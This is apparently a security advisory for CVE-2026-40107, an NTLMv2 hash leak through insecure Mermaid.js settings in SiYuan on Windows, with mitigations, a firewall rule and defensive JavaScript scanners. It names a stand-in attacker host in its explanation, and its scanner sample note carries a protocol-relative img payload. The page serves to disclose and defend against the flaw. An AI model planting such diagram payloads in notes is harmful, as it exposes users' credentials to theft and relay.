CVE-2026-40107 Overview
SiYuan is a personal knowledge management system that contains a Server-Side Request Forgery (SSRF) vulnerability in its Mermaid.js diagram rendering configuration. Prior to version 3.6.4, the application configures Mermaid.js with securityLevel: "loose" and htmlLabels: true, which allows <img> tags with src attributes to survive Mermaid's internal DOMPurify sanitization and land in SVG <foreignObject> blocks. When a victim opens a note containing a malicious Mermaid diagram on Windows, protocol-relative URLs are resolved as UNC paths, triggering automatic SMB authentication and exposing the victim's NTLMv2 hash to attackers.
Critical Impact
Attackers can steal NTLMv2 authentication hashes from Windows users by crafting malicious Mermaid diagrams, enabling credential relay attacks or offline password cracking.
Affected Products
- SiYuan versions prior to 3.6.4
- SiYuan Electron client on Windows
Discovery Timeline
- 2026-04-09 - CVE-2026-40107 published to NVD
- 2026-04-09 - Last updated in NVD database
Technical Details for CVE-2026-40107
Vulnerability Analysis
This vulnerability stems from an insecure configuration of the Mermaid.js diagramming library within SiYuan's Electron-based client. The root cause is the combination of securityLevel: "loose" and htmlLabels: true settings, which weakens the library's built-in protections against HTML injection.
When Mermaid.js processes diagrams with these settings, HTML elements including <img> tags pass through DOMPurify sanitization intact. These elements are then placed within SVG <foreignObject> blocks. The critical issue is that the resulting SVG content is injected into the DOM via innerHTML without any secondary sanitization step.
On Windows systems, this creates a particularly dangerous attack surface. When a malicious diagram contains an image reference using a protocol-relative URL (e.g., //attacker.com/image.png), Windows interprets this as a UNC path (\\attacker.com\image.png). The operating system then automatically attempts SMB authentication to the attacker-controlled server, transmitting the victim's NTLMv2 hash without any user interaction beyond opening the malicious note.
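The resolution step described above, reproduced with the WHATWG URL API as an added illustration (not code from SiYuan or Mermaid), together with a render-time allowlist that refuses such image sources; it also covers explicit UNC paths, which resolve the same way. The document base, host names and function names are assumptions made for the example; the page does not state which base origin SiYuan's client renders notes from.

```javascript
// Added example (not SiYuan or Mermaid code). Reproduces the resolution step
// with the WHATWG URL API and applies a render-time allowlist for <img src>.
// The base URL and host names below are constructed for the demonstration;
// the document base SiYuan's client actually renders from is not stated here.

// Resolve an image src against the document base, as the browser engine does.
function resolveImageSrc(src, baseHref) {
  const resolved = new URL(src, baseHref);
  // Chromium on Windows maps file://host/path to the UNC path \\host\path,
  // which is what makes the OS attempt SMB authentication to "host".
  const uncPath =
    resolved.protocol === "file:" && resolved.hostname !== ""
      ? "\\\\" + resolved.hostname + resolved.pathname.replace(/\//g, "\\")
      : null;
  return { href: resolved.href, protocol: resolved.protocol, uncPath };
}

// Allowlist policy for diagram images: only http(s) sources are accepted, so
// protocol-relative, file: and explicit UNC references are all refused.
function imageSrcPolicy(src, baseHref) {
  let info;
  try {
    info = resolveImageSrc(src, baseHref);
  } catch (err) {
    return { allowed: false, reason: "unparseable URL" };
  }
  if (info.uncPath !== null) {
    return { allowed: false, reason: "resolves to UNC path " + info.uncPath };
  }
  if (info.protocol !== "http:" && info.protocol !== "https:") {
    return { allowed: false, reason: "disallowed scheme " + info.protocol };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed document base: a note rendered from the local file system.
const DOC_BASE = "file:///C:/Users/alice/SiYuan/note.html";

// Walk through the case the advisory text describes.
const decision = imageSrcPolicy("//smb.example/image.png", DOC_BASE);
console.log(decision.reason); // resolves to UNC path \\smb.example\image.png
```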
Root Cause
The vulnerability is classified under CWE-918 (Server-Side Request Forgery). The insecure Mermaid.js configuration allows untrusted content to trigger outbound network requests from the application. The lack of secondary sanitization on SVG content injected via innerHTML compounds the issue, permitting attacker-controlled URLs to reach the rendering engine.
Attack Vector
The attack is network-based and requires no authentication or privileges from the attacker's perspective. An attacker can craft a malicious Mermaid diagram containing a specially formatted <img> tag with a protocol-relative URL pointing to an attacker-controlled SMB server. When shared via SiYuan's note-sharing mechanisms or imported into a victim's knowledge base, opening the note triggers the credential theft.
The attack flow proceeds as follows: the malicious diagram passes through Mermaid.js processing, the <img> tag survives sanitization, the SVG is rendered via innerHTML, the Electron client attempts to fetch the image resource, and Windows automatically sends NTLMv2 credentials to the attacker's server.
Detection Methods for CVE-2026-40107
Indicators of Compromise
- Outbound SMB traffic (TCP port 445) to external IP addresses or suspicious domains
- Network connections to protocol-relative URLs or UNC paths from the SiYuan application process
- Unusual authentication events logged in Windows Security Event logs (Event ID 4624/4625 with network logon type)
Detection Strategies
- Monitor for outbound SMB connections originating from Electron-based applications
- Implement network-level detection for NTLM authentication attempts to non-corporate IP ranges
- Deploy endpoint detection rules for SiYuan processes initiating connections to unknown external hosts
Monitoring Recommendations
- Enable Windows Event logging for authentication events and correlate with SiYuan process activity
- Configure firewall rules to alert on outbound SMB traffic to non-whitelisted destinations
- Review shared SiYuan notes for suspicious Mermaid diagram content containing protocol-relative URLs
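One way to carry out the note review in the last point, as an added example that is not SiYuan's own code: a helper that scans a note's Markdown for Mermaid code fences and reports image sources inside them that are protocol-relative, explicit UNC paths or file: URLs. The sample note, host name and function names are constructed for the example.

```javascript
// Added example (not SiYuan code): scan a note's Markdown for Mermaid fences
// and report <img> sources inside them that are protocol-relative, explicit
// UNC paths or file: URLs. The sample note and host name are constructed.
const FENCE = "`".repeat(3); // keeps literal triple backticks out of this listing

// Image sources that have no place in a diagram from an untrusted note.
const RISKY_SRC = [
  { re: /^\/\//, reason: "protocol-relative URL (resolved as a UNC path on Windows)" },
  { re: /^\\\\/, reason: "explicit UNC path" },
  { re: /^file:/i, reason: "file: URL" },
];

// Return the reason a src is risky, or null when it matches no pattern.
function classifySrc(src) {
  const hit = RISKY_SRC.find((p) => p.re.test(src.trim()));
  return hit ? hit.reason : null;
}

// One finding per risky <img src> inside a Mermaid fence; diagram numbers are
// 1-based so a reviewer can locate the block in the note.
function scanNoteForRiskyDiagrams(markdown) {
  const fence = new RegExp(FENCE + "mermaid[^\\n]*\\n([\\s\\S]*?)" + FENCE, "g");
  const img = /<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const findings = [];
  let diagram = 0;
  let block;
  while ((block = fence.exec(markdown)) !== null) {
    diagram += 1;
    let tag;
    while ((tag = img.exec(block[1])) !== null) {
      const src = tag[1] ?? tag[2] ?? tag[3] ?? "";
      const reason = classifySrc(src);
      if (reason !== null) findings.push({ diagram, src, reason });
    }
  }
  return findings;
}

// Constructed sample: a benign flowchart followed by one carrying a
// protocol-relative image reference of the kind the advisory describes.
const SAMPLE_NOTE = [
  "# Meeting notes",
  FENCE + "mermaid",
  "flowchart LR",
  "  A[Plan] --> B[Build]",
  FENCE,
  FENCE + "mermaid",
  "flowchart LR",
  '  A[<img src="//smb.example/logo.png">] --> B[Done]',
  FENCE,
].join("\n");
```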
How to Mitigate CVE-2026-40107
Immediate Actions Required
- Upgrade SiYuan to version 3.6.4 or later immediately
- Block outbound SMB traffic (TCP 445) at the network perimeter for non-essential systems
- Review recently imported or shared notes for malicious Mermaid diagram content
Patch Information
The vulnerability is fixed in SiYuan version 3.6.4. Users should upgrade to this version or later to remediate the vulnerability. For detailed information about the security fix, refer to the GitHub Security Advisory.
Workarounds
- Block outbound SMB traffic at the host or network firewall level to prevent credential theft even if a malicious diagram is opened
- Avoid opening untrusted or externally-sourced SiYuan notes until the application is upgraded
- Consider disabling Mermaid diagram rendering temporarily if patch deployment is delayed
# Windows firewall rule to block outbound SMB traffic (run from an elevated command prompt)
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp remoteport=445
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.